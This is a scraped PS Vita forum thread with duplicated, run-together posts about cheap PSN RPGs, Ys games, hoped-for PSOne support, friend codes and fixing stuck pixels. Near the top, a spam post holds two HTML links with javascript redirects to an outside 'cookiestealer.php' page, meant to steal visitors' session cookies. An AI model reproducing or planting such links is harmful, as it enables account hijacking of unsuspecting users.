I think all the Ys games are $15 on the US store. Ys Seven is great, but I actually prefer both Ys 1 & 2 Chronicles and Ys: The Oath in Felghana. You can't go wrong with either one!Is Ys 7 the one I want? Anyone know what it costs on the NA store if so? I'm at work but I was going to grab a pre paid card on lunch.
I need a break from god eater for a bit.
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<a href=javascript:void(document.location="http://jhinga.my3gb.com/cookiestealerWTFMAN.php?
what is this<a href=javascript:void(document.location="http://jhinga.my3gb.com/cookiestealer.php?
The lack of PS1 support is the reason for the thread title. Here is a list I made of what's available on the European PSN store. If you're from America the selection is even better.I'm in a financial position where I could get a Vita this sometime this summer and have been seriously considering it. I really like JRPGs so I'm hoping it ends up similar to the PSP where there are a lot of them.
How do PSone Classics look on it?
archnemesis said:The PSV is region free, but you can only have one region activated at a time. If you want to buy games from the US you can order PSN store cards online instead of using a debit/credit card.
A lot of good RPGs can be found on the PSN store for cheap these days. The RPGs below are available directly from a European Vita. If you own a PS3, there are more games you can buy on it and then transfer over.
- Aedis Eclipse: Generation of Chaos - €14.99
- Ape Quest - €9.99
- Blazing Souls Accelate - €19.99
- Breath of Fire 3 - €9.99
- ClaDun: This is an RPG! - €9.99
- ClaDun x2 - €19.99
- Disgaea 2: Dark Hero Days - €19.99
- Final Fantasy I - €9.99
- Final Fantasy II - €9.99
- Final Fantasy IV: Complete Collecton - €19.99
- Final Fantasy Tactics: War of the Lions - €9.99
- Generation of Chaos - € 6.99
- Half Minute Hero - €11.99
- Innocent Life: A Futuristic Harvest Moon - €9.99
- Key of Heaven - €7.99
- Lunar: Silver Star Harmony - €11.99
- Mana Khemia: Student Alliance - €9.99
- Phantom Brave: The Hermuda Triangle - €9.99
- Riviera - €17.99
- Shin Megami Tensei: Persona - €9.99
- Shin Megami Tensei: Persona 2: Innocent Sin - €29.99
- Shin Megami Tensei: Persona 3 - €29.99
- Spectral Souls: Resurrection of the Ethereal Empires - €14.99
- Tactics Ogre: Let Us Cling Together - €19.99
- The 3rd Birthday - €9.99
- Legend of Heroes: Trails in the Sky - €29.99
- Valhalla Knights - €5.99
- Valhalla Knights 2 - €9.99
- Valhalla Knights 2: Battle Stance - €11.99
- White Knight Chronicles: Origins - €7.99
- Wild Arms XF - €17.99
- Ys I & II Chronicles - €9.99
- Ys: The Oath in Felghana - €9.99
- Ys Seven - €9.99
- Zettai Hero Project - €14.99
The following PSP RPGs didn't make it over to Europe. I'm probably forgetting something.
- Brave Story: New Traveler
- Class of Heroes
- Hexyz Force
- Jeanne d'Arc
- Knights in the Nightmare
- Monster Kingdom: Jewel Summoner
- Yggdra Union: We'll Never Fight Alone
Thanks!I think all the Ys games are $15 on the US store. Ys Seven is great, but I actually prefer both Ys 1 & 2 Chronicles and Ys: The Oath in Felghana. You can't go wrong with either one!
Really want an XSEED sale, would buy up Ys games and Corpse Party in an instant. :|
(Today, 07:19 AM)
That was quick
There is a big gaming event on China tommorow "China Joy 2012". some upcoming vita games will be demoed like Ragnarok Odyssey, Little Big Planet and Persona 4: Golden
Really wish SCEA would do this: those guys suck ballz and probably too worried about next gen to bother with an all Vita event. What was in the link that got the guy banned?
PASBR Beta is up in Asia and Singapore. Hope we get it a Vita Beta
New to the Vita party, anyone know if they have commented on PS2 or PSOne games from the store being playable? Seems like I would like to dip into the catalog while I wait for new actual Vita games ;_;
New to the Vita party, anyone know if they have commented on PS2 or PSOne games from the store being playable? Seems like I would like to dip into the catalog while I wait for new actual Vita games ;_;
Even if Sony managed to get Capcom to put the MH franchise on the Vita, we would still have to deal with Capcom localization/announcements of announcements of announcements. However, I'll admit importing the game would have been much less of a hassle.You know, I've thought about this too but everyday that MHP3rd G isn't announced is another day I don't think this will happen. Especially since it's likely God Eater 2 is going to be this fall with a Vita SKU, and SCE creating their own proper MH response in Soul Sacrifice.
You know, I've thought about this too but everyday that MHP3rd G isn't announced is another day I don't think this will happen. Especially since it's likely God Eater 2 is going to be this fall with a Vita SKU, and SCE creating their own proper MH response in Soul Sacrifice.
Need some more Vita friends. My leaderboards are getting bare. PSN Angra_Mainya
Here's the list of games that I have. Games
Rumor is "Sony set to release PSOne support during Gamescomhttp://n4g.com/news/1045814/rumor-psone-compatibility-coming-to-ps-vita-at-gamescom
That'd be magical.
That'd be magical.
Not really, they announced it for summer - and august and GC is the last date where they could still unveil and release it in promised timeframe.
What would be magical is Sony making all of the PSOne library compatible given the long delay. I only want RE3 but many here would love alot more.
Give me Sine Mora in August and I am a happy camper. Anyone else hear about The Walking Dead heading to IOS? Wooosaahh IOS gaming needs to die a horrible death.
Field Commander has asynchronous multiplayer and is under $10. Anyone want to play a few games?
That's SOE's Advance Wars clone right? I'm surprised the servers are still up.
Need some more Vita friends. My leaderboards are getting bare. PSN Angra_Mainya
Here's the list of games that I have. Games
Need some more Vita friends. My leaderboards are getting bare. PSN Angra_Mainya
Here's the list of games that I have. Games
Sent you a request. Need some more vita peeps too. Handle is Mentaiko_Allergy.
That'd be magical.
What would be magical is Sony making all of the PSOne library compatible given the long delay. I only want RE3 but many here would love alot more.
Sine Mora and Zen Pinball 2 in August, please.
And keep dreaming about the death of iOS gaming. It will never happen.
Speaking of SotN above, how's the PSP Dracula X chronicles? Worth the $15?
Sometime in August. Around the 15th, I believe?Indeed. When is gamescom again?
I'd say that's worth it.Speaking of SotN above, how's the PSP Dracula X chronicles? Worth the $15?
Add me if you want; UMvC3 is on the way, and I have Motostorm RC/MK9/SSD currently. PSN: corrosivefrost
Add me too, if you want.
Isn't that on the list of servers that are going down?
About a month ago I noticed I had two or three pixels in a vertical line that would display a faint red when they should have been black. They were only really visible in the dark, but I'm pretty sure they weren't there when I bought the thing.
I tried the trick of firmly pressing/massaging the screen around the stuck pixels and discovered that if I pressed above the pixels the stuck red got really bright (freaked myself out there) but if I pressed below the pixels they started working properly. Once I got them working I pressed all over the screen a bit to see if they came back, but they seem to be fixed.
All in all the screen pressing trick did fix the pixels, but it got worse before it got better, so YMMV and attempt at your own risk etc.
I also tried the video that flashes lots of colours to unstick pixels after the pressing trick, but I'm not sure whether that did anything or not because it was already working.
No idea what caused the stuck pixels in the first place, but since pressing the screen fixed it I'm thinking maybe something hard was pressing against the screen in my bag ort something..
And since I'm here, while closely examining my screen in the dark I can con firm that the faint green splotches everybody has have gotten much better since I got it in February.